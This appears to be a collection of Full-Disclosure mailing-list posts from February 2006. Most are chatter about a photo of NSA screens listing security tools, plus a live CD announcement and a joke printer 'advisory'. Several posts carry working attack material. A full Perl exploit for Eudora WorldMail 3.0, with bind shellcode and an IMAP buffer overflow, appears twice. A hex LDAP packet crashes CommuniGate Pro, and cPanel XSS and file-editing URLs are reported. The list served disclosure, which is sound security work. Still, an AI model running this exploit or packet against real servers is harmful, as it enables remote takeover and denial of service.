Re: [Full-disclosure] NSA tracking open source security tools
> ummm, that page is just: > > http://securitywizardry.com/radar.htm > Oh, shit that's hilarious! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] cPanel 10 mime/handle.html XSS Vulnerability
mime/handle.html of cPanel 10 is vulnerable to an XSS vulnerability. This can be leveraged by entering an injected html into the extension and/or mime-type specified. I sucesfully leveraged this issue causing the page to execute the code alert('hi') each time. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NSA tracking open source security tools
this troll is for autist ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] cPanel 10 File Editing Vulnerability
On 04 Feb 06, at 09:16, Shell wrote: In cPanel 10, the script "erredit.html," which is supposed to edit a specific set of files, can edit any file acessible by the cPanel. Example: http://www.example.com:2082/frontend/x/err/erredit.html? dir=public_html/&file=index.php Tested on a real cPanel system running cPanel 10.8.1-RELEASE. This won't edit files outside the user's home directory, even with traversal paths, and deletes files before writing them - this doesn't appear exploitable; indeed, it doesn't seem to be much except a weird way of editing your own files. PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NSA tracking open source security tools
Jason Coombs wrote: Sure, it made for a fine photo op. But based on the Bush administration's decision-making processes there is good reason to believe that A) the people at the NSA who created the mock-ups for public relations purposes died unexpectedly and the people who took over their jobs didn't know that the intelligence they were looking at was meaningless drivel produced for the benefit of manipulating public opinion, or B) the NSA is only showing the Bush administration the same mock-ups that the rest of us get to see. C) it's something to put in the background for the media blitz that tags along behind the prez. Surely you don't think that the NSA would allow cameras into their real NOC/SOC/POC/FOC/LOC/CROCK -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] NSA tracking open source security tools
How do you come to the conclusion that they are tracking open source tools from that picture?? You could also say they are tracking IDS signatures, virus signatures, alert con, attacked ports and what time it is in ... All I see is a webpage and people standing in front of it for a photo op, "Hey Bush is coming to visit, got anything nice to pull up on the screen for him?" I would also "hope" that the NSA has a much better way of tracking things than via a 3rd party website. What a joke :-) Mike www.infosec.co.nz > -Original Message- > From: [EMAIL PROTECTED] [mailto:full-disclosure- > [EMAIL PROTECTED] On Behalf Of Jason Coombs > Sent: Sunday, February 05, 2006 11:23 AM > To: Fyodor > Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk > Subject: Re: [Full-disclosure] NSA tracking open source security tools > > Fyodor wrote: > > George Bush visiting the NSA headquarters in Fort Meade. A wall-sized > > screen in the background displays the latest versions of our favorite > > open source security tools, including Nmap, Metasploit, Snort, > > Ethereal, Cain & Abel, and Kismet. Nifty. > > The NSA must have learned information security tricks from Microsoft. > > Who in their right mind would focus their attention on software version > numbers and think that makes for better security? > > Somebody tell the NSA they need to keep track of hash codes instead. > > Regards, > > Jason Coombs > [EMAIL PROTECTED] > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NSA tracking open source security tools
[EMAIL PROTECTED] wrote: it is a neat NOC page to have on a big screen. scares management-type folk. and Presidents of non democratic countries ;-) Sure, it made for a fine photo op. But based on the Bush administration's decision-making processes there is good reason to believe that A) the people at the NSA who created the mock-ups for public relations purposes died unexpectedly and the people who took over their jobs didn't know that the intelligence they were looking at was meaningless drivel produced for the benefit of manipulating public opinion, or B) the NSA is only showing the Bush administration the same mock-ups that the rest of us get to see. In either case, the whole show begs the question "Who's really in charge?" as well as "What electronic voting equipment manufacturer elected THEM President?" Best, Jason Coombs [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] BackTrack live CD
Hi list, Remote-Exploit would like to introduce BackTrack - the consolidation of the two leading pentesting live CD distributions - Whax and Auditor. The new distro features the best of both distributions, and lots of nifty features, including the latest tools and exploits, an appealing interface, accessibility, and a rich Python development environment. BackTrack is now in Beta, and can be downloaded from http://www.remote-exploit.org/ Mati Aharoni & Max Moser www.remote-exploit.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NSA tracking open source security tools
On Sun, Feb 05, 2006 at 11:23:10AM +1300, Jason Coombs wrote: > Fyodor wrote: > >George Bush visiting the NSA headquarters in Fort Meade. A wall-sized > >screen in the background displays the latest versions of our favorite > >open source security tools, including Nmap, Metasploit, Snort, > >Ethereal, Cain & Abel, and Kismet. Nifty. > > The NSA must have learned information security tricks from Microsoft. > Who in their right mind would focus their attention on software version > numbers and think that makes for better security? Or, alternatively, it was just a quickly ginned-up background made to look "high-tech" for the President's visit. Yeah, it's stupid to have version numbers scrolling by on the screen as useful information, but it's even dumber to think that the NSA would put live, or even important, data on the screen during a freaking photo op, with the press all over the place. -- "After a while, the hanged man will become motionless and his gallows will oscillate as if its fulcrum were the hanged man." - Mario Salvadori, Columbia University, 1984. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NSA tracking open source security tools
Hi, > > to track Nmap release status. And apparently they are doing so :). > > The latest (February 6) issue of Newsweek has a picture on page 39 of > > George Bush visiting the NSA headquarters in Fort Meade. A wall-sized ummm, that page is just: http://securitywizardry.com/radar.htm it is a neat NOC page to have on a big screen. scares management-type folk. and Presidents of non democratic countries ;-) alan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NSA tracking open source security tools
Fyodor wrote: George Bush visiting the NSA headquarters in Fort Meade. A wall-sized screen in the background displays the latest versions of our favorite open source security tools, including Nmap, Metasploit, Snort, Ethereal, Cain & Abel, and Kismet. Nifty. The NSA must have learned information security tricks from Microsoft. Who in their right mind would focus their attention on software version numbers and think that makes for better security? Somebody tell the NSA they need to keep track of hash codes instead. Regards, Jason Coombs [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (OLD) Eudora WorldMail 3.0 Windows 2000 Remote System Exploit
what is this in response to? - bob On 2/4/06, markus magnus <[EMAIL PROTECTED]> wrote: > ### > ### Eudora WorldMail 3.0 Windows 2000 Remote System > Exploit > ### November 2005 > ### > ### Tested on Windows 2000 Server SP4 > ### > ### info(AT)com-winner.com > ### http://www.com-winner.com > ### http://www.com-winner.com/CWCOM/cwc-index/ > ### > > use IO::Socket::INET; > use strict; > > # win32_bind - EXITFUNC=seh LPORT= Size=344 > Encoder=PexFnstenvSub http://metasploit.com > my $shellcode = > "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x63". > "\x88\xf7\xf7\x83\xeb\xfc\xe2\xf4\x9f\xe2\x1c\xba\x8b\x71\x08\x08". > "\x9c\xe8\x7c\x9b\x47\xac\x7c\xb2\x5f\x03\x8b\xf2\x1b\x89\x18\x7c". > "\x2c\x90\x7c\xa8\x43\x89\x1c\xbe\xe8\xbc\x7c\xf6\x8d\xb9\x37\x6e". > "\xcf\x0c\x37\x83\x64\x49\x3d\xfa\x62\x4a\x1c\x03\x58\xdc\xd3\xdf". > "\x16\x6d\x7c\xa8\x47\x89\x1c\x91\xe8\x84\xbc\x7c\x3c\x94\xf6\x1c". > "\x60\xa4\x7c\x7e\x0f\xac\xeb\x96\xa0\xb9\x2c\x93\xe8\xcb\xc7\x7c". > "\x23\x84\x7c\x87\x7f\x25\x7c\xb7\x6b\xd6\x9f\x79\x2d\x86\x1b\xa7". > "\x9c\x5e\x91\xa4\x05\xe0\xc4\xc5\x0b\xff\x84\xc5\x3c\xdc\x08\x27". > "\x0b\x43\x1a\x0b\x58\xd8\x08\x21\x3c\x01\x12\x91\xe2\x65\xff\xf5". > "\x36\xe2\xf5\x08\xb3\xe0\x2e\xfe\x96\x25\xa0\x08\xb5\xdb\xa4\xa4". > "\x30\xdb\xb4\xa4\x20\xdb\x08\x27\x05\xe0\xe6\xab\x05\xdb\x7e\x16". > "\xf6\xe0\x53\xed\x13\x4f\xa0\x08\xb5\xe2\xe7\xa6\x36\x77\x27\x9f". > "\xc7\x25\xd9\x1e\x34\x77\x21\xa4\x36\x77\x27\x9f\x86\xc1\x71\xbe". > "\x34\x77\x21\xa7\x37\xdc\xa2\x08\xb3\x1b\x9f\x10\x1a\x4e\x8e\xa0". > "\x9c\x5e\xa2\x08\xb3\xee\x9d\x93\x05\xe0\x94\x9a\xea\x6d\x9d\xa7". > "\x3a\xa1\x3b\x7e\x84\xe2\xb3\x7e\x81\xb9\x37\x04\xc9\x76\xb5\xda". > "\x9d\xca\xdb\x64\xee\xf2\xcf\x5c\xc8\x23\x9f\x85\x9d\x3b\xe1\x08". > "\x16\xcc\x08\x21\x38\xdf\xa5\xa6\x32\xd9\x9d\xf6\x32\xd9\xa2\xa6". > "\x9c\x58\x9f\x5a\xba\x8d\x39\xa4\x9c\x5e\x9d\x08\x9c\xbf\x08\x27". > "\xe8\xdf\x0b\x74\xa7\xec\x08\x21\x31\x77\x27\x9f\x93\x02\xf3\xa8". > "\x30\x77\x21\x08\xb3\x88\xf7\xf7"; > > sub usage { >print "usage: perl Worldmail.pl serverip\n"; > } > > print "Worldmail.pl\nEudora WorldMail Server REMOTE > SYSTEM EXPLOIT\n"; > if ($#ARGV < 0) { >usage(); >exit(); > } > > my $host=$ARGV[0]; > my $sock = IO::Socket::INET->new(PeerAddr => $host, > PeerPort => 143, > Proto=> 'tcp'); > > my $nops="\x90" x 10; > > my $ret="\xfd\x2b\x9a\x01"; # call ebx in worldmail > 3.0 cram.dll > my $x = $nops . $shellcode . ("A" x 427) . "\xeb\x04" > . $ret . "\xe9\xeb\xfc\xff\xff"; > > print $sock "A003 APPEND saved-messages (\Seen) > {\"$x\"}\r\n"; > > print "\nNow telnet to remote host on port ...\n"; > > while (1) { >$a=<$sock>; > } > > > > > > > ___ > Telefonate ohne weitere Kosten vom PC zum PC: http://messenger.yahoo.de > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Robert Q Kim, Wireless Internet Advisor http://hsdpa-coverage.com http://www.antennacoverage.com/cell-repeater.html https://www.antennacoverage.com/cell-phone-antenna-booster.html 2611 S. Pacific Coast Highway 101 Suite 102 Cardiff by the Sea, CA 92007 206 984 0880 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (OLD) Eudora WorldMail 3.0 Windows 2000 Remote System Exploit
### ### Eudora WorldMail 3.0 Windows 2000 Remote System Exploit ### November 2005 ### ### Tested on Windows 2000 Server SP4 ### ### info(AT)com-winner.com ### http://www.com-winner.com ### http://www.com-winner.com/CWCOM/cwc-index/ ### use IO::Socket::INET; use strict; # win32_bind - EXITFUNC=seh LPORT= Size=344 Encoder=PexFnstenvSub http://metasploit.com my $shellcode = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x63". "\x88\xf7\xf7\x83\xeb\xfc\xe2\xf4\x9f\xe2\x1c\xba\x8b\x71\x08\x08". "\x9c\xe8\x7c\x9b\x47\xac\x7c\xb2\x5f\x03\x8b\xf2\x1b\x89\x18\x7c". "\x2c\x90\x7c\xa8\x43\x89\x1c\xbe\xe8\xbc\x7c\xf6\x8d\xb9\x37\x6e". "\xcf\x0c\x37\x83\x64\x49\x3d\xfa\x62\x4a\x1c\x03\x58\xdc\xd3\xdf". "\x16\x6d\x7c\xa8\x47\x89\x1c\x91\xe8\x84\xbc\x7c\x3c\x94\xf6\x1c". "\x60\xa4\x7c\x7e\x0f\xac\xeb\x96\xa0\xb9\x2c\x93\xe8\xcb\xc7\x7c". "\x23\x84\x7c\x87\x7f\x25\x7c\xb7\x6b\xd6\x9f\x79\x2d\x86\x1b\xa7". "\x9c\x5e\x91\xa4\x05\xe0\xc4\xc5\x0b\xff\x84\xc5\x3c\xdc\x08\x27". "\x0b\x43\x1a\x0b\x58\xd8\x08\x21\x3c\x01\x12\x91\xe2\x65\xff\xf5". "\x36\xe2\xf5\x08\xb3\xe0\x2e\xfe\x96\x25\xa0\x08\xb5\xdb\xa4\xa4". "\x30\xdb\xb4\xa4\x20\xdb\x08\x27\x05\xe0\xe6\xab\x05\xdb\x7e\x16". "\xf6\xe0\x53\xed\x13\x4f\xa0\x08\xb5\xe2\xe7\xa6\x36\x77\x27\x9f". "\xc7\x25\xd9\x1e\x34\x77\x21\xa4\x36\x77\x27\x9f\x86\xc1\x71\xbe". "\x34\x77\x21\xa7\x37\xdc\xa2\x08\xb3\x1b\x9f\x10\x1a\x4e\x8e\xa0". "\x9c\x5e\xa2\x08\xb3\xee\x9d\x93\x05\xe0\x94\x9a\xea\x6d\x9d\xa7". "\x3a\xa1\x3b\x7e\x84\xe2\xb3\x7e\x81\xb9\x37\x04\xc9\x76\xb5\xda". "\x9d\xca\xdb\x64\xee\xf2\xcf\x5c\xc8\x23\x9f\x85\x9d\x3b\xe1\x08". "\x16\xcc\x08\x21\x38\xdf\xa5\xa6\x32\xd9\x9d\xf6\x32\xd9\xa2\xa6". "\x9c\x58\x9f\x5a\xba\x8d\x39\xa4\x9c\x5e\x9d\x08\x9c\xbf\x08\x27". "\xe8\xdf\x0b\x74\xa7\xec\x08\x21\x31\x77\x27\x9f\x93\x02\xf3\xa8". "\x30\x77\x21\x08\xb3\x88\xf7\xf7"; sub usage { print "usage: perl Worldmail.pl serverip\n"; } print "Worldmail.pl\nEudora WorldMail Server REMOTE SYSTEM EXPLOIT\n"; if ($#ARGV < 0) { usage(); exit(); } my $host=$ARGV[0]; my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 143, Proto=> 'tcp'); my $nops="\x90" x 10; my $ret="\xfd\x2b\x9a\x01"; # call ebx in worldmail 3.0 cram.dll my $x = $nops . $shellcode . ("A" x 427) . "\xeb\x04" . $ret . "\xe9\xeb\xfc\xff\xff"; print $sock "A003 APPEND saved-messages (\Seen) {\"$x\"}\r\n"; print "\nNow telnet to remote host on port ...\n"; while (1) { $a=<$sock>; } ___ Telefonate ohne weitere Kosten vom PC zum PC: http://messenger.yahoo.de ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ProtoVer LDAP vs CommuniGate Pro 5.0.7
I. DESCRIPTION CommuniGate Pro Core Server from CommuniGate Systems provides robust cross-platform groupware applications, enabling a cost effective, easy to manage communications platform. For more info visit http://www.stalker.com II. DETAILS ProtoVer LDAP testsuite v1.5 uncovered critical Denial of Service vulnerability in LDAP component of CommuniGate Pro Server 5.0.7 The vulnerability could be used by a remote unauthenticated attacker to crash the server. Example debug session is below. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1458242640 (LWP 25554)] 0x080fa008 in VDirectoryFile::findParentDN () (gdb) backtrace #0 0x080fa008 in VDirectoryFile::findParentDN () #1 0x080fa031 in VDirectoryFile::findParentDN () ... #353 0x080fa031 in VDirectoryFile::findParentDN () #354 0x080fcc6f in VDirectoryFile::findRecords () #355 0x080efc23 in VDirectory::findDirectoryRecords () #356 0x081b09b3 in VLDAPInput::processInput () #357 0x082cb5a3 in VStream::worker () #358 0x082cc419 in VStream::starter () #359 0x0839c369 in STThreadStarter () #360 0xa9a09b80 in start_thread () from /lib/libpthread.so.0 #361 0xa9976dee in clone () from /lib/libc.so.6 To reproduce the vulnerability, send the following data to LDAP port: """ 30 82 02 38 02 01 01 63 82 02 31 04 82 02 15 64 63 3d 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 64 63 3d 65 78 61 6d 70 6c 65 2c 64 63 3d 63 6f 6d 0a 01 02 0a 01 00 02 01 00 02 01 00 01 01 00 a2 05 87 03 66 6f 6f 30 00 """ III. VENDOR RESPONSE The vendor has released 5.0.8 version which addresses this issue. Quote from http://www.stalker.com/CommuniGatePro/History.html: """ 5.0.8 03-Feb-06 * Directory: DN processing changed to avoid problems with DNs containing too many (>100) elements. """ IV. CREDIT The vulnerability has been found using GLEG Ltd's ProtoVer LDAP testsuite: http://www.gleg.net/protover_ldap.shtml ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NSA tracking open source security tools
--On February 4, 2006 1:21:41 AM -0800 Fyodor <[EMAIL PROTECTED]> wrote: Of the recent U.S. political scandals, one of the most divisive is the issue of President Bush (IMHO illegally) authorizing the NSA to conduct warantless wiretaps on Americans' phone calls and emails. While I don't like the NSA tracking my phone calls, they are welcome to track Nmap release status. And apparently they are doing so :). The latest (February 6) issue of Newsweek has a picture on page 39 of George Bush visiting the NSA headquarters in Fort Meade. A wall-sized screen in the background displays the latest versions of our favorite open source security tools, including Nmap, Metasploit, Snort, Ethereal, Cain & Abel, and Kismet. Nifty. For those without the magazine, I have posted a pic at: Soyou think what the NSA is doing is illegal and you don't like them tracking your phone calls (why would they be? Are you talking to bin Laden?), but you think that them using tools that can be used to successfully hack computer networks is "nifty"? No double standard there, huh? :-) Love Nmap, BTW. Great tool. Thanks for writing and consistently maintaining it. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] cPanel 10 File Editing Vulnerability
In cPanel 10, the script "erredit.html," which is supposed to edit a specific set of files, can edit any file acessible by the cPanel. Example: http://www.example.com:2082/frontend/x/err/erredit.html?dir=public_html/&file=index.php ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] zepcom001
HUMMM To me that looks like a binary file being sent to the printer or lp or lpd device... Normally it is a bad idea to send binary files to the printers because they do not know how to deal with such files. Security risk maybe. Just means you have stupid users if they are going to send binaries to a printer. After all it will cause may one or two lines of junk to be printed if not the entire page, and maybe even so much junk that it makes the printer run out of paper. Kill the job reset the printer wait for next stupid user. rather than using /ntldr or /kernel build your own binary and print it. On Sat, 2006-02-04 at 06:29 +0100, [EMAIL PROTECTED] wrote: > > > > zepcom-001.txt > Hello dear readers and welcome to our fist advisory! > we have found a ressurse exarstion bog in notepad and assosiated > ressurses. > if u have a printer and u type start and run and type notepad and > then you type > NOTEPAD.EXE /P C:\NTLDR and not make mutex_a to prevent dedflock > then your PRINTER will run OUT of PAPER! this is bad!! > This is a serrius ressurse starvation of big company if they print > regnings > or other important papers. This has been veriffied on: > > windows NT ( UNTESTED ) > > windows 2000 sp0 > windows 2000 sp1 > windows 2000 sp2 > windows 2000 sp3 > windows 2000 sp4 > windows 2000 sp5 > windows 2000 sp6 > > windows XP sp0 > windows XP sp1 > windows XP sp2 > windows XP sp3 > > AND OPEN SOURC EALSO HAS PROBLEM WITH CAT > IF you use cat and feed to telnet and port 90+00 of > print server and put to /kernel then you can kill the printer! > This can be very serius flav for big billing company -- Leif Ericksen <[EMAIL PROTECTED]> ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NSA tracking open source security tools
On Sat, 2006-02-04 at 07:36 -0500, TheGesus wrote: > The NSA wrote libpcap in the first place. > > Takes one to know one, I guess. :-) The NRG (Network Research Group) of the ICSD (Information and Computing Sciences Division) at LBNL (Lawrence Berkeley National laboratory) in Berkeley, California actually wrote libpcap. And other nice tools, like tcpdump, traceroute, http://www-nrg.ee.lbl.gov/ That was at least true one or two decades ago. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NSA tracking open source security tools
On 2/4/06, Fyodor <[EMAIL PROTECTED]> wrote: > Of the recent U.S. political scandals, one of the most divisive is the > issue of President Bush (IMHO illegally) authorizing the NSA to > conduct warantless wiretaps on Americans' phone calls and emails. > While I don't like the NSA tracking my phone calls, they are welcome > to track Nmap release status. And apparently they are doing so :). > The latest (February 6) issue of Newsweek has a picture on page 39 of > George Bush visiting the NSA headquarters in Fort Meade. A wall-sized > screen in the background displays the latest versions of our favorite > open source security tools, including Nmap, Metasploit, Snort, > Ethereal, Cain & Abel, and Kismet. Nifty. For those > without the magazine, I have posted a pic at: > > http://www.insecure.org/nmap/nmap_inthenews.html#bush > > Maybe open source software really will take over the world :). > The NSA wrote libpcap in the first place. Takes one to know one, I guess. :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NSA tracking open source security tools
Of the recent U.S. political scandals, one of the most divisive is the issue of President Bush (IMHO illegally) authorizing the NSA to conduct warantless wiretaps on Americans' phone calls and emails. While I don't like the NSA tracking my phone calls, they are welcome to track Nmap release status. And apparently they are doing so :). The latest (February 6) issue of Newsweek has a picture on page 39 of George Bush visiting the NSA headquarters in Fort Meade. A wall-sized screen in the background displays the latest versions of our favorite open source security tools, including Nmap, Metasploit, Snort, Ethereal, Cain & Abel, and Kismet. Nifty. For those without the magazine, I have posted a pic at: http://www.insecure.org/nmap/nmap_inthenews.html#bush Maybe open source software really will take over the world :). Cheers, Fyodor PS: For those who missed the announcement, Nmap 4.0 is now available: http://www.insecure.org/stf/Nmap-4.00-Release.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/